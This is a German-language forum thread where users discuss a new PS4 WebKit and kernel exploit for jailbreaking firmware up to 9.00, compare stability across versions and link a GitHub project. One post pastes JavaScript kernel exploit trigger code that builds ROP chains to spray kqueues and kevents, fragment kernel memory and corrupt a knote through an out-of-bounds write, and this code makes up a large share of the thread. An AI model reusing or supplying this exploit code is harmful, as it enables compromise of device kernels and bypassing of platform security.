Neuer WebKit Exploit PS4

  • Die Frage ist ob der Exploit wirklich stabiler ist...

  • Das wird sich zeigen, wenn das so im Netz ist wird sich da schon jemand dran machen, dann mal sehen ob mehr "stable" ist ^^ 9.00 ist schon sehr stable an sich

  • 7.55 User freuen sich aber 9.00 ob das viel Unterschied macht

  • Soll schneller und zuverlässiger sein :thumbup:


    Externer Inhalt youtu.be
    Inhalte von externen Seiten werden ohne Ihre Zustimmung nicht automatisch geladen und angezeigt.
    Durch die Aktivierung der externen Inhalte erklären Sie sich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.


    Habe muxi gefragt :nono:

    Wird mich bestimmt löschen :boxen:

  • function trigger_oob() {

    init();

    const chain = new Chain();

    const num_kqueue = 0x1b0;

    const kqueues = new Uint32Array(num_kqueue);

    const kqueues_p = get_view_vector(kqueues);


    for (let i = 0; i < num_kqueue; i++) {

    chain.push_syscall('kqueue');

    chain.push_gadget('pop rdi; ret');

    chain.push_value(kqueues_p.add(i * 4));

    chain.push_gadget('mov dword ptr [rdi], eax; ret');

    }

    chain.push_end();

    chain.run();

    chain.clean();


    const AF_INET = 2;

    const SOCK_STREAM = 1;

    // socket descriptor

    chain.syscall('socket', AF_INET, SOCK_STREAM, 0);

    const sd = chain.return_value;

    if (sd.low() < 0x100 sd.low() >= 0x200) {

    die(`invalid socket: ${sd}`);

    }

    debug_log(`socket descriptor: ${sd}`);


    // spray kevents

    const kevent = new Uint8Array(0x20);

    const kevent_p = get_view_vector(kevent);

    kevent_p.write64(0, sd);

    // EV_ADD and EVFILT_READ

    kevent_p.write32(0x8, 0x1ffff);

    kevent_p.write32(0xc, 0);

    kevent_p.write64(0x10, Int.Zero);

    kevent_p.write64(0x18, Int.Zero);


    for (let i = 0; i < num_kqueue; i++) {

    // nchanges == 1, everything else is NULL/0

    chain.push_syscall('kevent', kqueues, kevent_p, 1, 0, 0, 0);

    }

    chain.push_end();

    chain.run();

    chain.clean();


    // fragment memory

    for (let i = 18; i < num_kqueue; i += 2) {

    chain.push_syscall('close', kqueues);

    }

    chain.push_end();

    chain.run();

    chain.clean();


    // trigger OOB

    alert('insert USB');


    // trigger corrupt knote

    for (let i = 1; i < num_kqueue; i += 2) {

    chain.push_syscall('close', kqueues);

    }

    chain.push_end();

    chain.run();

    chain.clean();


    alert('no kernel panic


    Das der Code

  • Aso das Video ist schon älter da würde gezeigt das auf 7.55 stabiler ist ja die freuen sich ob jetzt bei 9.00 so groß Unterschied ist wird man sehen ^^

  • Externer Inhalt twitter.com
    Inhalte von externen Seiten werden ohne Ihre Zustimmung nicht automatisch geladen und angezeigt.
    Durch die Aktivierung der externen Inhalte erklären Sie sich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.

    Das obige Skript verwendet Chain803 von PSFree. Wie Sie sehen können, kopiert es buchstäblich nur das ursprüngliche trigger_spray() aus dem 9.00-Kexploit (mit einigen kleineren

    Unterschiede aufgrund der Verwendung von Chain803 anstelle der rop-API von Cryptogenic).


    Daher verwenden Entwickler mit Firmwares < 9.00, die einen unzuverlässigen Kexploit haben, einfach pOOBs4.

  • > Braucht kein Mensch mit 9.0 FW


    Das würde ich im Vorfeld nicht behaupten. Bei manchen läuft der momentane 9.00 Jailbreak nicht immer gut durch, was nicht unbedingt am Kernel-Exploit liegen muss, sondern vielmehr im WebKit-Exploit seine Ursache haben könnte (auch wenn der Crash erst irgendwann später erfolgt). Man müsste das wirklich ausprobieren, um sich sicher zu sein.

  • Guten Morgen!

    Psfree Webkit Exploit & ChendoChap Kernel Exploit für PS4 Firmware 900 wurde angepasst.

    GitHub - kmeps4/PSFree900: Psfree Webkit Exploit & ChendoChap Kernel Exploit For PS4 Firmware 900
    Psfree Webkit Exploit & ChendoChap Kernel Exploit For PS4 Firmware 900 - GitHub - kmeps4/PSFree900: Psfree Webkit Exploit & ChendoChap Kernel Exploit For PS4…
    github.com

    Wird es eine muxi900 geben?

    Gruß

    :D

  • und möchte nicht unnötig auf 9.60 updaten um nachher festzustellen, dass es nicht funktioniert.

    Ich kann dir jetzt schon sagen, dass es nicht funktionieren wird! Für einen JB sind immer ein Webkit- und Kernel-Exploit erforderlich. Ein Webkit-Exploit alleine ist nutzlos, selbst wenn er auf der aktuellsten FW ausführbar wäre! Der PS4 Kernel Exploit ist offiziell nur bis FW 9.00 verfügbar! Steht auch so oben in der Beschreibung von PSFree900 "PSfree Webkit Exploit & ChendoChap Kernel Exploit for PS4 FW 900".

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!